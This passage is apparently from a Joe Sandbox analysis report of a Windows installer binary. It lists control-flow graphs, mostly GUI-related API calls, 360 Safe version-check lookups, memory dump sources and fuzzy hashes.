                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Item$Show$MessageMoveSend$BrushCreateDirectoryEnableException@8H_prolog3LongRectSolidSystemThrow_memset
                                                                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                                                                      • API String ID: 1048186457-364855578
                                                                                                                                                                                                                      • Opcode ID: c0a783cb95b1fea6bb540c4a0a9756c5338be91e013da1ef8f03f10627c56bc3
                                                                                                                                                                                                                      • Instruction ID: b78a683f3871c43c353d5fc1b933bbfb2698a653ef99c14b35ddec579b3ef5fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0a783cb95b1fea6bb540c4a0a9756c5338be91e013da1ef8f03f10627c56bc3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAD16E30240B08AFD631AB71CE56FEBBBA9EF44744F00492DF1AB561A2DF767914DA10

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00FFFFFF), ref: 00AC6F99
                                                                                                                                                                                                                        • Part of subcall function 00AC65A6: __EH_prolog3.LIBCMT ref: 00AC65AD
                                                                                                                                                                                                                        • Part of subcall function 00AC65A6: GetDlgItem.USER32(?,00000403), ref: 00AC65D5
                                                                                                                                                                                                                        • Part of subcall function 00AC65A6: GetDlgItem.USER32(?,000003EF), ref: 00AC665A
                                                                                                                                                                                                                        • Part of subcall function 00AC65A6: GetDlgItem.USER32(?,000003F1), ref: 00AC66B4
                                                                                                                                                                                                                        • Part of subcall function 00AC65A6: GetDlgItem.USER32(?,00000411), ref: 00AC66E7
                                                                                                                                                                                                                      • MoveWindow.USER32(?,000000D7,000000A7,000000AF,00000050,00000001), ref: 00AC6FCB
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AC6FE1
                                                                                                                                                                                                                      • MoveWindow.USER32(?,00000212,0000013E,00000032,00000014,00000001), ref: 00AC6FFD
                                                                                                                                                                                                                      • MoveWindow.USER32(?,00000027,00000008,00000090,0000001E,00000001), ref: 00AC7012
                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000003C,0000003F,00000046,00000014,00000001,?,00000027,00000008,00000131,PNG), ref: 00AC7041
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00AC704D
                                                                                                                                                                                                                        • Part of subcall function 00AA60A3: ScreenToClient.USER32(?,?), ref: 00AA60B5
                                                                                                                                                                                                                        • Part of subcall function 00AA60A3: ScreenToClient.USER32(?,?), ref: 00AA60C1
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00AC7065
                                                                                                                                                                                                                        • Part of subcall function 00A87EB5: __EH_prolog3.LIBCMT ref: 00A87EBC
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00AC707E
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,0000003C,0000003C,0000001C,00000001), ref: 00AC70D1
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000050,00000109,00000014,00000001), ref: 00AC70EC
                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000018E,00000050,00000050,00000014,00000001), ref: 00AC7106
                                                                                                                                                                                                                        • Part of subcall function 00AC4B9F: GetWindowRect.USER32(?,?), ref: 00AC4BBC
                                                                                                                                                                                                                        • Part of subcall function 00AC4B9F: GetWindowTextLengthW.USER32(?), ref: 00AC4BD0
                                                                                                                                                                                                                        • Part of subcall function 00AC4B9F: GetDC.USER32(?), ref: 00AC4BDB
                                                                                                                                                                                                                        • Part of subcall function 00AC4B9F: _memset.LIBCMT ref: 00AC4BEB
                                                                                                                                                                                                                        • Part of subcall function 00AC4B9F: GetTextMetricsW.GDI32(00000000,?), ref: 00AC4BF8
                                                                                                                                                                                                                        • Part of subcall function 00AC4B9F: ReleaseDC.USER32(?,00000000), ref: 00AC4C0B
                                                                                                                                                                                                                        • Part of subcall function 00AC4B9F: MoveWindow.USER32(?,?,?,00000000,?,00000001), ref: 00AC4C2C
                                                                                                                                                                                                                      • MoveWindow.USER32(?,0000003C,00000087,00000046,00000014,00000001), ref: 00AC7129
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AC7139
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AC7141
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,?), ref: 00AC71A3
                                                                                                                                                                                                                        • Part of subcall function 00AB407A: ShowScrollBar.USER32(00000005,00000003,00000000,00000018,00000000,?,00000018), ref: 00AB40A5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Move$Item$ClientRect$Show$H_prolog3ScreenText$BrushCreateLengthMessageMetricsReleaseScrollSendSolid_memset
                                                                                                                                                                                                                      • String ID: <$CustomContrlList$PNG$X
                                                                                                                                                                                                                      • API String ID: 3202666548-2186719467
                                                                                                                                                                                                                      • Opcode ID: 013e930a005c6f8225392448bc112ed0c182d88ef63b4b2cd793bebb06c804b0
                                                                                                                                                                                                                      • Instruction ID: 3329c17af068a7805050dad557b14bfe72e6d4b4a94d95ccd85dcbf460c2b465
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 013e930a005c6f8225392448bc112ed0c182d88ef63b4b2cd793bebb06c804b0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5515471A50308BFEB21AF64CD46FDE7BB9AF18B00F000419F655BA1E1DBB16A04CB51

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AA8F8F
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00AA8F97
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: GetWindowLongW.USER32(-00000004,000000F0), ref: 00AA7949
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00AA7984
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00AA7997
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: GetDlgItem.USER32(-00000004,0000E801), ref: 00AA79A4
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: IsWindow.USER32(00000000), ref: 00AA79AE
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: GetClientRect.USER32(-00000004,?), ref: 00AA79F8
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: GetDlgItem.USER32(-00000004,0000E801), ref: 00AA7A1F
                                                                                                                                                                                                                        • Part of subcall function 00AA7927: IsWindow.USER32(00000000), ref: 00AA7A2C
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA8FC2
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00AA8FCC
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00AA8FF7
                                                                                                                                                                                                                        • Part of subcall function 00AA6180: GetWindowLongW.USER32(?,000000F0), ref: 00AA6198
                                                                                                                                                                                                                        • Part of subcall function 00AA6180: GetParent.USER32 ref: 00AA61AD
                                                                                                                                                                                                                        • Part of subcall function 00AA6180: GetWindowRect.USER32(?,?), ref: 00AA61C7
                                                                                                                                                                                                                        • Part of subcall function 00AA6180: GetWindowLongW.USER32(?,000000F0), ref: 00AA61DD
                                                                                                                                                                                                                        • Part of subcall function 00AA6180: MonitorFromWindow.USER32(?,00000002), ref: 00AA61FC
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 00AA9017
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 00AA901C
                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00AA9026
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00AA9032
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00AA9045
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 00AA904A
                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00AA9054
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AA9061
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00AA9067
                                                                                                                                                                                                                        • Part of subcall function 00AA7EF3: EnterCriticalSection.KERNEL32(00B5BC7C), ref: 00AA7F09
                                                                                                                                                                                                                        • Part of subcall function 00AA7EF3: LeaveCriticalSection.KERNEL32(00B5BC7C), ref: 00AA7F1E
                                                                                                                                                                                                                        • Part of subcall function 00AA749D: __recalloc.LIBCMT ref: 00AA74E3
                                                                                                                                                                                                                        • Part of subcall function 00AA7530: __recalloc.LIBCMT ref: 00AA7576
                                                                                                                                                                                                                        • Part of subcall function 00AA5AFC: _memset.LIBCMT ref: 00AA5B0D
                                                                                                                                                                                                                        • Part of subcall function 00AA5AFC: SHAppBarMessage.SHELL32(00000000,?), ref: 00AA5B2F
                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001,?,?,?,?,?,?,?,00B265E9,000000FF), ref: 00AA90D0
                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,?,?,?,?,?,?,?,00B265E9,000000FF), ref: 00AA90D7
                                                                                                                                                                                                                      • PostMessageW.USER32(?,00003AB1,00000000,00000000), ref: 00AA9121
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Long$Message$MetricsSendSystem$CallbackCriticalDispatcherImageItemLoadRectSectionUser__recalloc$ClientCurrentEnterFromLeaveMonitorParentPostTextThread_memset
                                                                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                                                                      • API String ID: 2213159910-364855578
                                                                                                                                                                                                                      • Opcode ID: 6a164f42191b42ae5c7cc7876def3fe7066c6daa4981669fe8afb00f714964f0
                                                                                                                                                                                                                      • Instruction ID: 6e46b8b68558b0c92bb7fa31e9b2d508d993e5c5470a53d1df13bc76606bb8fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a164f42191b42ae5c7cc7876def3fe7066c6daa4981669fe8afb00f714964f0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A719A71204304AFE714EF64CC85FABBBA9FF49344F100629F5528B2E2DB76E8018B61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 348 ade0d8-ade145 call af5421 call af4550 SHGetValueW 353 ade30f 348->353 354 ade14b-ade152 348->354 356 ade311-ade333 call af4647 353->356 354->353 355 ade158-ade15b 354->355 355->353 357 ade161-ade197 call a7b680 PathCombineW PathFileExistsW 355->357 362 ade1ad-ade22c call a8cb91 * 2 call af4550 PathCombineW * 3 call a7e370 357->362 363 ade199-ade1a8 call a7dd20 357->363 374 ade2b4-ade2d8 call af4550 call a7e370 362->374 375 ade232-ade240 call a7e370 362->375 363->356 385 ade2ec-ade301 call add748 374->385 386 ade2da 374->386 375->374 380 ade242-ade253 call a7e370 375->380 380->374 389 ade255-ade25c call a7e7d0 380->389 391 ade306-ade30d 385->391 387 ade2df-ade2e7 call a7c8e0 386->387 387->385 394 ade261-ade266 389->394 391->387 394->374 395 ade268-ade289 GetProcAddress * 2 394->395 396 ade28b-ade29e 395->396 397 ade2a3-ade2a5 395->397 396->397 402 ade2a0 396->402 398 ade2ac-ade2b0 397->398 399 ade2a7-ade2a9 397->399 398->391 401 ade2b2 398->401 399->398 401->374 402->397
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00ADE0F7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADE11A
                                                                                                                                                                                                                      • SHGetValueW.SHLWAPI(?,?,?,?,?,00000080,?,?,00000018), ref: 00ADE13C
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,?,?,?,?,00000018), ref: 00ADE186
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 00ADE18F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADE1DE
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360ver.dll,?,?,?,?,?,00000018), ref: 00ADE1F5
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,?,360Common.dll,?,?,?,?,?,00000018), ref: 00ADE203
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,360Base.dll,?,?,?,?,?,00000018), ref: 00ADE214
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Get360SafeVersion), ref: 00ADE274
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,IsBetaVersion), ref: 00ADE281
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADE2C1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Path$Combine$_memset$AddressProc$ExistsFileH_prolog3Value
                                                                                                                                                                                                                      • String ID: 0.0.0.0$360Base.dll$360Common.dll$360ver.dll$Get360SafeVersion$IsBetaVersion
                                                                                                                                                                                                                      • API String ID: 2656314946-96710800
                                                                                                                                                                                                                      • Opcode ID: 08745d8c1c9c9f15cde77a9409fe23e86a7c1d74090c33b9e896579df33f06a6
                                                                                                                                                                                                                      • Instruction ID: 91bd6a6420462c43d4903cff488ff0499b4796d0fe12fa0b1b827f26911cde74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08745d8c1c9c9f15cde77a9409fe23e86a7c1d74090c33b9e896579df33f06a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E613B76900249ABDF21EFA5DC85EEF77BCEB48704F10442AE556DB281EB71A604CB60

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 404 aa7927-aa7936 405 aa7938-aa793e 404->405 406 aa7940 404->406 407 aa7942-aa7958 GetWindowLongW 405->407 406->407 408 aa795a-aa7961 call a9d5cf 407->408 409 aa7966-aa7971 407->409 408->409 410 aa799d-aa79b6 GetDlgItem IsWindow 409->410 411 aa7973-aa798c call aa62fa SendMessageW 409->411 414 aa79b8-aa79bd 410->414 415 aa79d2-aa7a12 call aa5ea9 GetClientRect 410->415 411->410 419 aa798e-aa7997 SendMessageW 411->419 414->415 417 aa79bf-aa79c8 414->417 423 aa7aca-aa7ace 415->423 424 aa7a18-aa7a30 GetDlgItem IsWindow 415->424 417->415 420 aa79ca-aa79cd call aa6019 417->420 419->410 420->415 425 aa7ad0-aa7adb 423->425 426 aa7b11-aa7b15 423->426 424->423 427 aa7a36-aa7a6a call aa5fc7 IsWindow 424->427 429 aa7aee-aa7af9 GetWindowRect 425->429 430 aa7add-aa7aec GetClientRect 425->430 431 aa7b1c-aa7b24 426->431 427->423 436 aa7a6c-aa7ac5 GetWindowRect MapWindowPoints call aa6fe3 427->436 433 aa7aff-aa7b0e 429->433 430->433 434 aa7b7a-aa7bb2 GetDlgItem GetWindowRect MapWindowPoints 431->434 435 aa7b26-aa7b2e 431->435 433->426 437 aa7bc0 434->437 438 aa7bb4-aa7bb7 434->438 439 aa7bfe-aa7c02 435->439 440 aa7b34-aa7b39 435->440 436->423 442 aa7bc2-aa7bf0 call aa6fe3 437->442 438->437 443 aa7bb9-aa7bbe 438->443 444 aa7b3b-aa7b40 440->444 445 aa7b72-aa7b78 440->445 446 aa7bf5-aa7bf9 442->446 443->442 444->446 448 aa7b46-aa7b6d call aa5ec6 444->448 445->446 446->431 448->446
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowLongW.USER32(-00000004,000000F0), ref: 00AA7949
                                                                                                                                                                                                                      • SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00AA7984
                                                                                                                                                                                                                      • SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00AA7997
                                                                                                                                                                                                                      • GetDlgItem.USER32(-00000004,0000E801), ref: 00AA79A4
                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00AA79AE
                                                                                                                                                                                                                      • GetClientRect.USER32(-00000004,?), ref: 00AA79F8
                                                                                                                                                                                                                      • GetDlgItem.USER32(-00000004,0000E801), ref: 00AA7A1F
                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00AA7A2C
                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00AA7A66
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00AA7A83
                                                                                                                                                                                                                      • GetWindowRect.USER32(-00000004,000000FF), ref: 00AA7AF9
                                                                                                                                                                                                                      • GetDlgItem.USER32(-00000004,000003E8), ref: 00AA7B7D
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00AA7B96
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00AA7BA6
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00AA7A93
                                                                                                                                                                                                                        • Part of subcall function 00AA6FE3: __recalloc.LIBCMT ref: 00AA702D
                                                                                                                                                                                                                      • GetClientRect.USER32(-00000004,000000FF), ref: 00AA7AE6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Item$ClientMessagePointsSend$Long__recalloc
                                                                                                                                                                                                                      • String ID: SCROLLBAR
                                                                                                                                                                                                                      • API String ID: 3924995472-324577739
                                                                                                                                                                                                                      • Opcode ID: cbad3e0c86292662219a6a10c12ad04952d71588fdbb531bccfebed2f1cbd1cb
                                                                                                                                                                                                                      • Instruction ID: cbb180b129a1f88d75bdb0f780036cd6ac21f9bbf2536812a58b542354223f0a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cbad3e0c86292662219a6a10c12ad04952d71588fdbb531bccfebed2f1cbd1cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55A12A71904208AFEB51CFA9C985AAFBBF5FF09310F10852AF515E72A0D770DA44CB61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AC65AD
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00AC65D5
                                                                                                                                                                                                                        • Part of subcall function 00AC3197: InvalidateRect.USER32(?,00000000,00000000,?,?,00AC0207,?), ref: 00AC31AD
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EF), ref: 00AC665A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F1), ref: 00AC66B4
                                                                                                                                                                                                                        • Part of subcall function 00ABF7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 00ABF7F6
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000411), ref: 00AC66E7
                                                                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003F6), ref: 00AC6774
                                                                                                                                                                                                                        • Part of subcall function 00AA6C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00AA6CBC
                                                                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003EA), ref: 00AC67C4
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000,000000E5,PNG,00000004,?), ref: 00AC680B
                                                                                                                                                                                                                      • GetDlgItem.USER32(000000FF,0000040F), ref: 00AC686E
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AC68A2
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AC68B0
                                                                                                                                                                                                                      • GetDlgItem.USER32(000000FF,00000410), ref: 00AC68DC
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00AC6903
                                                                                                                                                                                                                      • GetDlgItem.USER32(000000FF,00000409), ref: 00AC6932
                                                                                                                                                                                                                        • Part of subcall function 00AC134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,00AA77F9,0000013F,PNG), ref: 00AC13A1
                                                                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003ED), ref: 00AC69D2
                                                                                                                                                                                                                        • Part of subcall function 00AC62CA: __EH_prolog3.LIBCMT ref: 00AC62D1
                                                                                                                                                                                                                        • Part of subcall function 00AC1610: EnableWindow.USER32(?,?), ref: 00AC161B
                                                                                                                                                                                                                        • Part of subcall function 00AC1610: InvalidateRect.USER32(?,00000000,00000001,?,?,00AA5AF9,?), ref: 00AC162A
                                                                                                                                                                                                                        • Part of subcall function 00AC1610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00AA5AF9,?), ref: 00AC163C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Show$H_prolog3InvalidateLongRect$EnableMessageRedrawSend
                                                                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                                                                      • API String ID: 1363821098-364855578
                                                                                                                                                                                                                      • Opcode ID: 55ce4ef89b8677c866b839a338de11c01577ccf30fff3ad7c1a405b789586da4
                                                                                                                                                                                                                      • Instruction ID: 3379c3bcd86fd40938c55ce25d4f0166cd6043e1d6cf430f95c53cd74273ed19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55ce4ef89b8677c866b839a338de11c01577ccf30fff3ad7c1a405b789586da4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DD15D70500B05AFDB25EB70CE96FEAB7A9AF04714F104A2CB16B661E2DF717A14CB11

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
